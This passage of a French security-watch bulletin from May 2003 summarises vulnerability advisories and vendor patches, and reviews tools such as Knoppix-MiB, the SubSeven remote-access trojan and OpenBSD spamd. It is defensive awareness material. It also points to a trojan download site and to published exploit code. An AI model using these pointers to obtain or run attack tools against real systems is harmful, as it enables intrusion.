Le serveur de messagerie FTGate Pro contient un débordement de buffer exploitable pour provoquer l'exécution de
code non sollicité.
Critique 07/05 Floosietek FTGate Pro v1.22 (1328)
Correctif existant Service SMTP
Bugtraq
iisPROTECT
Contournement d'authentification dans iisPROTECT
La protection fournie par iisPROTECT est facilement contournable.
Forte
23/05 iisPROTECT versions 2.1 et 2.2Les versions antérieures sont probablement aussi affectées
Mauvaise gestion des caractères encodés dans les URLs
Correctif existant iisPROTECT
iDefense 05.22.03 http://www.idefense.com/advisory/05.22.03.txt
KERIO
Vulnérabilité dans Kerio Personal Firewall
Deux vulnérabilités ont été découvertes dans la fonctionnalité d'administration à distance de Kerio Personal Firewall.
Critique 29/04 Kerio Personal Firewall 2.1.4 et précédents
Administration à distance
Faiblesse du mécanisme de chiffrement, Débordement de buffer
Aucun correctif
CORE03-0305-02 http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
LINUX MANDRAKE
Augmentation de privilèges par 'cdrecord'
L'utilitaire 'cdrecord' permet d'acquérir les privilèges root lorsqu'il est installé setuid.
Forte
14/05 Linux Mandrake utilisant cdrecord 2.0
'cdrecord'
Vulnérabilité de formatage de chaîne de caractères
Aucun correctif
Bugtraq
MICROSOFT
Page 38/65
Mai 2003
Exécution de programme arbitraire via Outlook Express
Il est possible de déposer et d'installer un exécutable dans la zone restreinte via Outlook Express.
Critique 23/05 Microsoft Outlook Express 6.00.2800.1123 avec Windows MediaPlayer 7.01.00.3055 ou 8.00.00.4487
Outlook Express
Appel non sécurisé des fichiers au format 'asf'
Aucun correctif
Malware
Cross-Site Scripting dans les serveurs ISA
Une faille de type Cross-Site Scripting affecte les serveurs Microsoft ISA.
Moyenne 22/05 Microsoft ISA Server 2000, 2000 FP1 et 2000 SP1
Serveurs ISA
Cross-Site Scripting
Aucun correctif
http://www.securityfocus.com/bid/7623
BID [7623]
MIRABILIS
Multiples vulnérabilités dans le client 'ICQ'
Plusieurs vulnérabilités affectent le client 'ICQ' de Mirabilis.
Forte
07/05 Mirabilis ICQ Pro 2003a et précédents
Clients 'ICQ' et 'POP3'
Débordements de buffer, Défaut de formatage de chaînes de caractères,
Aucun correctif
CORE-2003-0303
Faiblesse de l'authentification
http://www.coresecurity.com/common/showdoc.php?idx=315&idxseccion=10
MOD_SURVEY
Déni de service contre le module Apache 'mod_survey'
Le module Apache 'mod_survey' permet de provoquer un déni de service contre le serveur sur lequel il est installé.
Forte
04/05 mod_survey 3.0.14 et précédents
Création de répertoires à l'initiative de l'utilisateur distant
Correctif existant Module apache 'mod_survey'
Bugtraq
NETSCAPE
Mauvais traitement des requêtes sur Netscape Enterprise
Une requête spécialement construite permet d'obtenir le contenu de la racine web des serveurs Netscape
Enterprise.
Faible
16/05 Netscape Enterprise Server versions 2.0, 3.0 à 3.6 SP3 et4.0 à 4.1 SP8
Mauvais traitement des requêtes
Correctif existant Serveurs Netscape Enterprise
BID 7621
OPERA
Débordement de buffer dans le navigateur Opera
Un débordement de buffer affecte le navigateur Opera.
Moyenne 23/05 Opera 7.10 build 2840 et 7.03 build 2670 (Windows), Opera7.1.0 Beta 1 build 388 (Linux)
Correctif existant Navigateur Opera
http://www.securiteam.com/securitynews/5XP0J0KA0G.html
Securiteam
SLMAIL
Multiples vulnérabilités dans SLMail et SLWebMail
De multiples vulnérabilités affectent SLMail et SLWebMail.
Forte
07/05 SLMail version 5.1.0.4420 (sur Windows)Interface SLWebMail
1 - Multiples débordements de buffer
Correctif existant 1 - SLMail
NISR07072003A
NISR07052003B
2 - SLWebMail
2 - Multiples vulnérabilités
http://www.nextgenss.com/advisories/slmail-vulns.txt
http://www.nextgenss.com/advisories/slwebmail-vulns.txt
SLOCATE
Débordement d'entier dans 'slocate'
Un débordement d'entier affecte le programme 'slocate'.
Moyenne 23/05 slocate 2.1 à 2.7
'slocate'
Débordement d'entier
Aucun correctif
BID 7629
Page 39/65
Mai 2003
YOUNGZSOFT
Vulnérabilité dans CMailServer 4.0
Le serveur de messagerie CMailServer contient un débordement de buffer exploitable pour provoquer l'exécution de
code non sollicité.
Critique 10/05 Youngzsoft CMailServer 4.0.2003.03.27
Correctif existant Service SMTP
http://www.infowarfare.dk/Advisories/iw-17-advisory.txt
Infowarfare
AUTRES INFORMATIONS
REPRISES D’AVIS
ET
CORRECTIFS
Les vulnérabilités suivantes, déjà publiées, ont été mises à jour, reprises par un autre organisme, ou ont
donné lieu à la fourniture d’un correctif :
CIAC
Reprise de l'avis HP HPSBUX0305-258, révision 1
Le CIAC a mis à jour son bulletin [N-094] pour refléter la mise à jour de l'avis original d'HP, faisant mention d'un
nouveau correctif.
Reprise de l'avis Oracle 54
Le CIAC a repris, sous la référence N-085, l'avis Oracle 54 au sujet d'un débordement de buffer dans le composant
Net Services d'Oracle permettant d'exécuter du code non sollicité.
Reprise de l'avis HP [SSRT3471]
Le CIAC a repris, sous la référence N-086, l'avis HP [SSRT3471] traitant d'une vulnérabilité de lien symbolique dans
'dupatch' et 'setld' sur HP Tru64 UNIX.
Reprise de l'avis Cisco sur Catalyst
Le CIAC a repris sour la référence [N-083] l'avis Cisco portant sur une vulnérabilité dans l'authentification sur ses
équipements Catalyst.
Reprise de l'avis Microsoft MS03-016
Le CIAC a repris sous la référence [N-087] l'avis de Microsoft portant sur deux vulnérabilités de 'BizTalk'.
Reprise de l'avis HP HPSBUX0304-257
Le CIAC a repris sous la référence [N-088] l'avis de HP portant sur une vulnérabilité dans 'rexec'.
Reprise de l'avis Red Hat RHSA-2003:093-14
Le CIAC a repris sous la référence [N-089] l'avis de Red Hat indiquant la disponibilité d'un correctif pour MySQL.
Le CIAC a repris sous la référence [N-090] l'avis de Red Hat portant sur une vulnérabilité du module Apache
'mod_auth_any'.
Reprise de l'avis Sun 46724
Le CIAC a repris, sous la référence N-091, l'avis Sun 46724 au sujet d'une vulnérabilité de PHP SafeMode
permettant l'exécution de code arbitraire distant via la fonction 'mail()'.
Reprise de l'avis Microsoft MS03-017
Le CIAC a repris, sous la référence N-092, l'avis Microsoft MS03-017 au suet d'une faille dans Windows Media
Player permettant l'exécution de programmes malicieux via les 'skins'.
Reprise de l'avis Cisco sur les VPN 3000
Le CIAC a repris, sous la référence N-093, le bulletin Cisco traitant de plusieurs vulnérabilités affectant les
concentrateurs VPN 3000.
Page 40/65
Mai 2003
Reprise de l'avis HP HPSBUX0305-258
Le CIAC a repris, sous la référence N-094, l'avis HP HPSBUX0305-258 au sujet d'une vulnérabilité localement
exploitable dans le programme 'wall'.
Le CIAC a repris sous la référence [N-095] l'avis de Red Hat concernant la disponibilité des correctifs pour KDE.
Reprise de l'avis SGI 20030407-01-P
Le CIAC a repris sous la référence [N-084] l'avis 20030407-01-P de SGI portant sur une vulnérabilité dans
l'utilisation de bases LDAP comme base d'utilisateurs.
CISCO
Informations sur un correctif pour les CSS 11000
Cisco a mis à jour son bulletin traitant de l'inefficacité de l'authentification de l'interface d'administration de ses CSS
11000. Cette vulnérabilité est corrigée dans la version 6.10 de WebNS, qui sera disponible fin mai 2003.
http://www.cisco.com/warp/public/707/arrowpoint-webmgmt-vuln-pub.html
Révision de deux bulletins sur 'CatOS' et 'ACS'
Cisco a révisé deux bulletins : Le premier fournit un lien vers des exemples de configuration AAA pour Cisco
Catalyst. Le second clarifie l'endroit où télécharger le correctif pour Cisco Secure ACS 3.1.1.
http://www.cisco.com/warp/public/707/cisco-sa-20030424-catos.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20030423-ACS.shtml
FREEBSD
Disponibilité de plusieurs correctifs
FreeBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages :
samba
FreeBSD-SA-03:01
seti@home
FreeBSD-SA-03:02
http://www.linuxsecurity.com/advisories/
HP
Nouveaux correctifs pour Sendmail
HP a publié de nouveaux correctifs pour Sendmail pour ses systèmes HP-UX 11.00 et 11.11.
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0304-253
Correctifs pour 'xdrmem_getbytes()'
HP a publié des correctifs pour ses
'xdrmem_getbytes()'.
systèmes
11.00
et
11.11,
concernant
la
vulnérabilité
touchant
Révision du bulletin HPSBUX0304-254 sur Samba
HP a révisé le bulletin HPSBUX0304-254 sur Samba afin de clarifier les l'identification de la version Samba utilisée.
Les correctifs pour les serveurs CIFS sont un portage sur une version Samba 2.2.5, issu de la version 2.2.8a.
Correctifs définitifs pour Samba/CIFS
HP a publié pour ses systèmes HP-UX 11.00, 11.11 et 11.22 la version A.01.09.04 de son server CIFS, immune au
débordement de buffer qui affecte les versions précédentes.
Mise à jour du bulletin sur OpenSSL
HP a mis à jour son bulletin indiquant des correctifs pour OpenSSL. Un correctif pour les serveurs utilisant une
version 1.3.27.02 ou précédente d'Apache est maintenant disponible.
Correctif pour 'wall' sur HP-UX 11.04
HP a publié un correctif pour HP-UX 11.04 pour l'utilitaire 'wall' qui permettait une augmentation de privilèges.
http://europe-support2.external.hp.com/atq/bin/doc.pl/screen=atqDocTextSecB/?CERTDOCID=HPSBUX0305-258
LINUX CALDERA
Disponibilité de nombreux correctifs
Caldera annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages :
samba
CSSA-2003-017.0
file
CSSA-2003-018.0
tcpsec
CSSA-2003-019.0
kmod/ptrace
CSSA-2003-020.0
mgetty
CSSA-2003-021.0
http://www.linuxsecurity.com/advisories/caldera.html
Page 41/65
Mai 2003
LINUX DEBIAN
Debian annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages :
pptpd
DSA-295-1
kdebase
DSA-296-1
snort
DSA-297-1
epic4
DSA-298-1
leksboot
DSA-299-1
balsa
DSA-300-1
libgtop
DSA-301-1
fuzz
DSA-302-1
mysql
DSA-303-1
lv
DSA-304-1
sendmail
DSA-305-1
ircii-pana
DSA-306-1
http://www.debian.org/security/2003/
LINUX MANDRAKE
Mandrake annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages :
ethereal
MDKSA-2003:051
9.1
snort
MDKSA-2003:052
8 2 / 9.0 / 9.1 /
FW 8.2 / CS 2.1
mgetty
MDKSA-2003:053
8 2 / 9.0
FW 8.2 / CS 2.1
man
MDKSA-2003:054
8 2 / 9.0 / 9.1 /
FW 8.2 / CS 2.1
kopete
MDKSA-2003:055
9.1
xinetd
MDKSA-2003:056
8 2 / 9.0 / 9.1 /
FW 8.2 / CS 2.1
mysql
MDKSA-2003:057
8 2 / 9.0
CS 2.1
cdrecord
MDKSA-2003:058
8 2 / 9.0 / 9.1 /
CS 2.1
lpr
MDKSA-2003:059
82
LPRng
MDKSA-2003:060
8 2 / 9.0 / 9.1 /
CS 2.1
http://www.linux-mandrake.com/en/security/
LINUX REDHAT
RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages :
ethereal
RHSA-2003:076-01
7.2 / 7.3 / 8.0 / 9.0
squirrelmail
RHSA-2003:112-01
8.0 / 9.0
lprng
RHSA-2003:142-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
micq
RHSA-2003:118-01
7.2 / 7.3
zlib
RHSA-2003:079-01
7.1 / 7.2 / 7.3 / 8.0
mysql
RHSA-2003:093-02
7.1 / 7.2 / 7.3 / 8.0
man
RHSA-2003:133-01
7.1 / 7.2 / 7.3 / 8.0
mod_auth
RHSA-2003:113-01
7.2 / 7.3
kde
RHSA-2003:002-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
xinetd
RHSA-2003:160-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
kernel
RHSA-2003:172-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
gnupg
RHSA-2003:175-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
lv
RHSA-2003:169-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
http://www.linuxsecurity.com/advisories/redhat.html
MICROSOFT
Mise à jour de l'avis MS02-071
Microsoft a mis à jour son bulletin MS02-071, concernant une vulnérabilité dans 'WM_TIMER' pour avertir de la
disponibilité d'un nouveau correctif pour NT 4.0 TSE. Le précédent était susceptible de causer des
dysfonctionnement sur les versions multiprocesseurs ou japonaises.
Vulnérabilité des comptes .NET Hotmail et Passport
Deux vulnérabilités similaires affectent les comptes .NET utilisés par les services Hotmail et Passport. La première
permet de contourner la question posée pour la remise à zéro du mot de passe lorsqu'un utilisateur a oublié le sien.
La seconde permet de remettre à zéro un compte utilisateur sans fournir d'information au préalable. Il n'existe pas
de correctif au niveau de l'utilisateur. On notera que Microsoft a supprimé, dans la soirée du 8 mai, l'option de
remise à zéro du mot de passe.
http://www.pakcert.org/advisory/PC-080503.html
Vulnérabilités non corrigées sur Internet Explorer
Le site de Thor Larholm recense les vulnérabilités affectant Internet Explorer. Nouvelles ou anciennes, 14
vulnérabilités ne sont toujours pas corrigées. Cette page fournit aussi quelques codes d'exploitation.
http://www.pivx.com/larholm/unpatched/
Page 42/65
Mai 2003
OPERA
Utilisation de machine virtuelle vulnérable
La version 7.11 d'Opera est fournie avec une version de la machine virtuelle java vulnérable au déni de service
affectant 'java.util.zip'. Toutefois, si une version immune de la machine virtuelle a été installée préalablement à
l'installation d'Opera, la machine virtuelle la plus à jour est conservée.
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0063.html
ORACLE
Révision de l'alerte 54 sur Oracle Net Services
Oracle a révisé l'alerte 54 sur Oracle Net Services afin d'annoncer la disponibilité de nouveaux correctifs pour les
versions Oracle Database Server 9.2.0.2, 9.0.1.4, 8.1.7.4 et 8.0.6.3.
http://otn.oracle.com/deploy/security/pdf/2003alert54.pdf
SGI
Nouveau correctif pour 'lpr'
SGI a publié un nouveau correctif pour 'lpr', sujet à diverses vulnérabilités. Certaines de ces vulnérabilités n'étaient
pas corrigées par le précédent correctif et le nouveau porte la référence '5071'.
ftp://patches.sgi.com/support/free/security/advisories/20030406-02-P
Correctif disponible pour OpenSSL
SGI a publié un correctif pour OpenSSL pour son système IRIX 6.5.19. L'application du correctif met à jour
OpenSSL vers la version 0.9.6g.
SUN
Vulnérabilité dans Samba sue les serveurs Cobalt
La vulnérabilité présente sur Samba 2.0.x à 2.2.7a affecte les serveurs Sun Cobalt RaQ4, RaQ XTR, Qube3, RaQ
550 ainsi que Sun Linux 5.0. Aucun correctif n'est disponible pour le moment, mais une parade est proposée par
Sun et par Samba.
Correctifs pour 'libnsl'
Sun a publié un correctif pour 'libnsl', dont un débordement de buffer permettait l'exécution de code arbitraire.
Notons qu'aucun correctif n'est actuellement disponible pour Solaris 7.
Correctifs pour 'cvs'
Sun a annoncé la disponibilité des correctifs pour 'cvs' pour Sun Cobalt et Sun Linux, vulnérables au problème de
type 'double-free' permettant d'exécuter des commandes arbitraires sur le serveur.
Correctifs pour 'libnsl'
Sun a publié les correctifs pour 'libnsl' pour Solaris 2.6, 7, 8 et 9 (Sparc et Intel). Un débordement de buffer permet
l'exécution de code arbitraire. Cette faille est décrite dans le bulletin CERT CA-2003-10.
CODES D’EXPLOITATION
Les codes d’exploitation des vulnérabilités suivantes ont fait l’objet d’une large diffusion :
KERIO
Code d'exploitation pour les pare-feu Tiny et Kerio
Un code d'exploitation pour Tiny et Kerio Personal Firewall a été publié dans la liste Bugtraq. Il est donc
recommandé de contacter l'éditeur pour obtenir un correctif, ou de désactiver le service d'administration
vulnérable.
BULLETINS ET NOTES
Les bulletins d’information suivants ont été publiés par les organismes officiels de surveillance et les
éditeurs :
APPLE
Faiblesse du chiffrement du mot de passe de 'AirPort'
La société @Stake a émis un avis pour informer que le point d'accès WiFI 'AirPort' d'Apple dissimule le mot de
passe administrateur circulant sur le réseau d'une manière permettant de le retrouver facilement. La réponse
d'Apple est qu'il est déconseillé d'utiliser une connexion WiFI non protégée par WEP pour administrer cet
équipement.
http://www.atstake.com/research/advisories/2003/a051203-1.txt
Page 43/65
Mai 2003
OpenBSD
Disponibilité de OpenBSD version 3.3
OpenBSD a annoncé la sortie de OpenBSD version 3.3. Cette nouvelle version apporte de grandes améliorations et
corrige plusieurs vulnérabilités.
http://www.openbsd.org/33.html
http://www.openbsd.org/plus33.html
VIRUS
Forte activité virale
Le site du CERT/CC et de Trend Micro mettent en garde contre deux vers, 'WORM_FIZZER' et la variante
'WORM_LOVGATE.J' qui se propagent rapidement actuellement.
http://www.trendmicro.com/vinfo/
http://www.cert.org/current/current_activity.html#peido
Propagation d'un ver sous couvert d'un avis Microsoft
Le récent ver 'W32/Palyh-A' qui se propage actuellement possède la particularité de se présenter comme un
message provenant du support technique de Microsoft. Si le message est ouvert le fichier attaché est exécuté et le
virus se propage alors classiquement en utilisant les carnets d'adresses ou les partages de fichiers.
http://www.sophos.com/virusinfo/analyses/w32palyha.html
Page 44/65
Mai 2003
ATTAQUES
OUTILS
KNOPPIX-MIB
# Description
La Fédération Informatique et Libertés annonce la sortie de ‘Knoppix-Mib’, une adaptation
Française de ‘Knoppix’, une distribution allemande d’un Linux 2.4.x minimaliste et prêt à
l’emploi. (Rapport N°43 – Février 2002).
Développée par Michel Bouissou – d’où l’extension ‘MiB’ – cette version intègre un module
permettant de chiffrer la mémoire virtuelle ainsi que les fichiers de l'utilisateur. Ceux-ci pourront
ainsi être sauvegardés en toute sécurité sur le disque du système hôte, ou sur tout autre dispositif
de stockage présent sur ce système, ‘Knoppix’ s’exécutant entièrement dans la mémoire vive du système.
La distribution actuelle de ‘Knoppix-Mib’ diffère de la version 3.2 de ‘Knoppix’ par l’ajout des modules et utilitaires
suivants:
- Environnement graphique KDE 3.1.1,
- Environnement de travail Ximian Evolution 1.2,
- Scripts permettant l’installation automatique de FlashPlayer,
- Support automatique des partitions chiffrées sur les systèmes de fichiers FAT/FAT32,
- Intégration de la version française de OpenOffice 1.0.2,
- Intégration du navigateur Mozilla 1.3 Chromium et d’Enigmail 0.74,
- Intégration du serveur de messagerie PostFix pré-configuré avec des certificats génériques et le support de TLS,
- Sauvegarde de certains fichiers de configuration système sur le volume de données de l’utilisateur,
- Pages de manuel en Français
Pour fonctionner correctement, ‘Knoppix-Mib’ requiert de disposer au minimum de 96 Mo de RAM, d’un processeur
INTEL x86, d’un espace disque libre sur un volume FAT ou FAT32 pour le stockage des données de l’utilisateur et
surtout d’un très bon lecteur de CD-Rom. Les tests effectués sur cette distribution ont démontré sa qualité et sa
capacité à gérer différents environnements matériels (poste fixe, portable, …). On regrettera cependant qu’une version
obsolète de Nessus (Nessus 1.2.7) soit livrée en appréciant par ailleurs la présence d’AirSnort, un analyseur dédié
réseaux ‘Wifi’.
Nous recommandons la lecture de l’excellente documentation d’installation intitulée ‘README-MIB’ préalablement à
toute utilisation du paquetage et en particulier la procédure permettant de créer un répertoire personnel qui sera
automatiquement reconnu lors du démarrage de ‘Knoppix’. L’utilisateur pressé pourra cependant démarrer ‘Knoppix’
puis lire le fichier ‘Comment créer son répertoire personnel’ directement accessible depuis le bureau. Attention
toutefois, un bogue conduit à ne plus pouvoir accéder à son répertoire si l’on a choisi de ne pas chiffrer celui-ci lors de
sa création.
Avec cette adaptation, Michel Bouissou - membre fondateur de la FIL, programmeur Linux et administrateur réseau
- nous offre enfin une version exploitable par tout un chacun et sécurisée de l’extraordinaire distribution ‘Knoppix’.
http://www.vie-privee.org/comm173
http://www.knopper.net/knoppix/
http://www.knoppixfr.org/
ftp://ftp.vie-privee.org/lafil/README-MiB
SUBSEVEN LEGENDS "
# Description
En février dernier une nouvelle version du célèbre outil de prise contrôle ‘SubSeven’ a été mise à
disposition à l’occasion du quatrième anniversaire de la diffusion de la toute première distribution. Après
avoir proposé en Janvier 2000 une édition spéciale dénommée ‘SubSeven Gold Edition’ (Rapport N°18
– Janvier 2000), ‘mobman’ réitère son approche ‘marketing’ en nous offrant une édition anniversaire
nommée ‘SubSeven Legends’.
Parmi tous les outils libres de type ‘RAT’ – Remote Access Tool - utilisés en environnement Windows dont les célèbres
BO (BackOrifice) et Socket23, ‘SubSeven’ reste encore à ce jour l’outil offrant la plus grande palette de fonctions.
On constatera l’absence de toute grande nouvelle fonctionnalité dans cette édition déjà annoncée en Février 2002 et
qui devra être considérée comme une simple mise à jour des versions 2.1.x. Ecrit en langage Delphi et désormais
parfaitement fonctionnelle dans les environnements ‘Windows2000’ et ‘Windows XP’, ‘SubSeven Legends’ offre
cependant la possibilité de modifier l’apparence du client par le biais d’un habillement (ou ‘skins’) totalement
configurable par l’utilisateur.
Nous devons avouer être quelque peu perplexe face au nombre de versions actuellement diffusées de cet outil, et plus
particulièrement, par l’absence totale d’informations concernant la stratégie utilisée pour numéroter les différentes
versions. Ainsi, la version 2.2 est disponible depuis mars 2001 (Rapport N°32 – Mars 2001). Doit-on en conclure que
Page 45/65
Mai 2003
l’auteur maintient deux branches de développement (V2.1.x et V2.2.x) en parallèle ?
Rappelons que cet outil est régulièrement utilisé à des fins illicites par des pirates désireux de conserver le contrôle
d’un système Windows compromis. L’existence d’une version fonctionnelle dans tous les environnements Windows va
certainement conduire à une recrudescence de l’utilisation de SubSeven dont la partie ‘serveur’ est toujours détectée
par la majorité des anti-virus.
Le lecteur se connectant sur le site ‘officiel’ de téléchargement sera accueilli par l’avertissement suivant probablement
destiné à éviter la fermeture du site au titre d’une quelconque loi sur la diffusion d’outils d’attaques.
This site uses 'hacker jargon' and role-playing scenarios when describing its activities and the use of the content
provided here in for effect and psychological reference. Any discussion of activities which could be considered
illegal by either Federal or State laws are purely fictional and should be regarded as such by all. Under no
circumstances should any of the role-playing scenarios or descriptions, detailed in conjunction with the content of
this site, be enacted on an unwitting or unauthorized computer or individual.
Le lecteur désireux d’en savoir plus sur les fonctionnalités offertes par la version précédente – Version 2.2 - pourra se
reporter à l’excellente analyse publiée en Mars 2001 par le SANS sous le titre ‘SubSeven 2.2: New Flavor of an Old
Favorite’.
http://www.subseven.ws/
http://www.sans.org/rr/toppapers/subseven_22.php
SPAMD
# Description
‘spamd’ est un outil permettant, comme son nom le suggère, de gérer les problèmes de SPAM. Le SPAM est un
terme utilisé pour qualifier l’envoie non sollicité de mails ou pouriels. C’est un phénomène de plus en plus courant.
Le but de cette pratique est de saturer les ressources d’internet, par l’émission quasi constante de trafic inutile. Pour
lutter contre ce phénomène, plusieurs techniques sont envisageables, et ont été implémentées au cours du temps.
Notre article présentera ‘spamd’, la solution du projet OpenBSD, disponible depuis la version 3.3 de leur système
d’exploitation.
Fonctionnement
‘spamd’ est en réalité un faux démon smtp, qui rejette le mail non légitime. Il est en écoute sur un socket local
(en écoute sur l’interface de loopback) et dans l’attente de connexions. Il interagit directement avec le filtre de
paquets ‘pf’, qui redirige de manière transparente vers ‘spamd’ tout trafic initié depuis une adresse contenue dans
la table ‘spamd’.
Dans ‘pf’, le concept de table permet de regrouper des règles concernant un ensemble d’adresses. Dans le cas de
‘spamd’, il permet de figer les règles par rapport à une base d’adresse qui est, elle, dynamique. Ainsi, les seules
modifications à apporter seront des modifications sur la table: ajout d’une adresse, suppression d’une adresse, etc…
Lorsqu’un polluposteur - une #telnet x.y.org 25
traduction de ‘spammer’ - est Trying A.B.C.D...
redirigé sur ‘spamd’, celui ci se Connected to A.B.C.D.
comporte comme un démon Escape character is '^]'.
SMTP classique, sauf qu’il répond 220 x.y.org ESMTP spamd IP-based SPAM blocker; Thu May 22 17:00
helo notme
très lentement aux requêtes du
250 Hello, spam sender. Pleased to be wasting your time.
polluer, et qu’il ne délivrera pas Mail from: [email protected]
le mail. En fait, le message 250 You are about to try to deliver spam.
d’erreur conduira le service de
Your time will be spent, for nothing.
messagerie du polluposteur à rctp to: [email protected]
maintenir le message en attente 450-SPAM. Your address a.b.c.d is in the spews level 1 database
et à tenter de régulièrement 450 See http://www.spews.org/ask.cgi?x=a.b.c.d for more details
Connection closed by foreign host.
retransmettre celui-ci.
Le lecteur l’aura compris, l’objectif est ici de monopoliser les ressources du service de ‘pollupostage’ afin de ralentir
son action voire de générer un surcoût suffisamment conséquent pour décourager le polluposteur.
Mise à jour de la base d’adresses
L’alimentation de la table ‘spamd’ peut se faire de plusieurs manières :
• En utilisant des listes directement renseignées par les administrateurs,
• En ajoutant à la table des entrées, en ligne de commande: ‘pfctl –t spamd –T add 1.2.3.0/24’ par exemple,
• Via l’ordonnanceur en utilisant ‘spamd-setup’ qui se chargera de la mise à jour.
L’utilisation de la dernière méthode est fortement recommandée. En effet, ‘spamd-setup’ est capable d’aller
charger des listes d’adresses mises à jour en temps réel sur les sources définies dans un fichier de configuration
dont un exemple est proposé ci-dessous:
spews1:\
:black:\
:msg="SPAM. Your address %A is in the spews level 1 database\n\
See http://www.spews.org/ask.cgi?x=%A for more details":\
:method=http:\
:file=www.spews.org/spews_list_level1.txt:
Page 46/65
Mai 2003
A ce propos, nos tests ont mis en évidence que deux des listes référencées – spews1, spews2 - ne sont
actuellement pas accessibles. En tentant d’accéder http://www.spews.org/spews_list_level1.txt nous tombons sur
une page blanche.
Il reste malgré tout les deux listes à télécharger sur www.okean.com, qui permettent d’avoir une base de plus de
9000 adresses de polluposteurs dans la table spamd, en utilisant la configuration par défaut.
L’exemple ci-dessous présente une règle permettant de charger une base d’adresses définie en local dans le fichier
‘myblack.txt’:
myblack:\
:black:\
:msg=/var/mail/myblackmsg.txt:\
:method=file:\
:file=/var/mail/myblack.txt
L’utilisation de l’adresse IP source comme moyen de discrimination pose le problème suivant:
qu’adviendra-t-il des mails envoyés par des clients/partenaires/amis qui auraient été malencontreusement
ajoutés aux listes diverses qu’utilise ‘spamd’ pour définir les adresses à rejeter ?
La solution proposée par ‘spamd’ consiste à établir une liste blanche contenant donc les adresses des machines qui
seront systématiquement autorisées à déposer du courrier.
mywhite:\
:white:\
:method=file:\
:file=/var/mail/mywhite.txt
On remarque que ‘spamd-setup’ s’appuie sur des bases existantes comme spews.org, ou encore okean.org,
ceci afin d’éviter de dupliquer l’effort de maintien des bases d’adresses référençant les polluposteurs.
Solutions alternatives
Plutôt que de filtrer au niveau paquet, il est possible d’intégrer au sein du serveur SMTP une vérification de chaque
mail portant sur les champs de l’entête ou sur le corps du message et de détecter une empreinte caractéristique
d’un ‘pollupostage’.
Cette méthode est implémentée par des logiciels comme SpamAssassin qui permet de qualifier la nature de
chaque mail, et ainsi de les filtrer soit au niveau MTA, soit au niveau MUA. Rappelons que le MTA (Mail Transport
Agent) est le terme générique pour qualifier un serveur SMTP, et que le terme MUA (Mail User Agent ) désigne les
logiciels clients de messagerie, comme Outlook, Mutt, etc…
L’inconvénient de cette approche réside dans le fait que le message étant acheminé la consommation des
ressources réseau est effective. Il incombera à l’utilisateur final de filtrer les messages marqués comme du
pollupostage.
Un exemple de mail qualifié par SpamAssassin comme étant du pollupostage est proposé ci-dessous :
From: "David Stone" <[email protected]>
To:
[email protected]
Subject: *****SPAM***** CONFIDENTIAL AND URGENT
Date:
Thu, 22 May 2003 16:32:35 +0200
------------------------ IMPORTANT NOTICE ---------------------------mail.YYYYY.org has identified this message as being probably spam.
The original message has been altered so you can recognise or block
similar unwanted mail in the future. You can do this by adding a filter
on the subject in your mail client software.
If you have a question, please ask [email protected].
Content analysis details:
(19.30 hits, 5 required)
FROM_ENDS_IN_NUMS
(0.7 points) From:
ends in numbers
REPLY_TO_HAS_UNDERLINE_NUMS (0.5 points) Reply-To: contains an underline and numbers/letters
RATWARE_OE_MALFORMED
(2.9 points) X-Mailer contains malformed Outlook Express version
US_DOLLARS
(1.4 points) BODY:
Nigerian scam key phrase (million dollars)
RAZOR2_CHECK
(2.0 points) Listed in Razor2, see http://razor.sf.net/
SUBJ_ALL_CAPS
(1.1 points) Subject is all capitals
FORGED_YAHOO_RCVD
(2.3 points) 'From' yahoo.com does not match 'Received' headers
RCVD_IN_OSIRUSOFT_COM
(0.6 points) RBL: Received via a relay in relays.osirusoft.com
[RBL check: found 135.102.179.80.relays.osirusoft.com., type: 127.0.0.6]
X_OSIRU_SPAMWARE_SITE
(1.1 points) RBL:
DNSBL: sender is a Spamware site or vendor
RCVD_IN_SBL
(0.6 points) RBL:
Received via SBLed relay,
see http://www.spamhaus.org/sbl/
[RBL check: found 135.102.179.80.sbl.spamhaus.org.]
FORGED_MUA_OUTLOOK
(3.3 points) Forged mail pretending to be from MS Outlook
NIGERIAN_BODY
(2.8 points) Message body has multiple indications of Nigerian spam
Page 47/65
Mai 2003
---------------------------------------------------------------------From: "David Stone" <[email protected]>
To: [email protected]
Reply-To: [email protected]
Subject: CONFIDENTIAL AND URGENT
Date: Thu, 22 May 2003 16:32:35 +0200
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
FROM- Prince David Stone
[email protected]
NUMBER:+228-902-88-44
DATE-22-5-2003
Les problèmes liés à l’envoi de mails non sollicité étant de plus en plus fréquents, il devient nécessaire de protéger son
système d’information contre toute tentative d’inondation par courrier électronique, mais également d’empêcher que
ses propres systèmes ne soient utilisés par des polluposteurs.
L’utilisation de techniques telles que celles employées par ‘spamd’ engendre plusieurs contraintes :
• La récupération des listes d’adresses utilise les services ‘FTP’ ou ‘HTTP’. Ces protocoles ne permettent pas de
garantir l’authenticité de la source et de la destination des connections, aussi il est envisageable de dérouter la
connexion, soit au niveau DNS, soit au niveau MAC, afin de fournir des listes d’adresses non valides, entraînant
un déni de service sur la messagerie,
• Le travail étant effectué au niveau paquet, il est nécessaire d’avoir des bonnes connaissances en terme de
routage et filtrage de flux IP,
• Enfin, dans le cas de ‘spamd’, l’environnement OpenBSD 3.3 (et son filtre de paquet ‘pf’) devra impérativement
être employé.
Pour conclure, ‘spamd’ reste une solution efficace pour lutter contre le ‘pollupostage’ étant donné qu’elle protège les
serveurs SMTP du périmètre considéré, mais également qu’elle permet de ralentir l’action des polluposteurs en
intervenant sur un facteur critique: le facteur économique.
http://www.openbsd.org
http://www.spamassassin.org
http://www.spews.org
http://www.okean.org
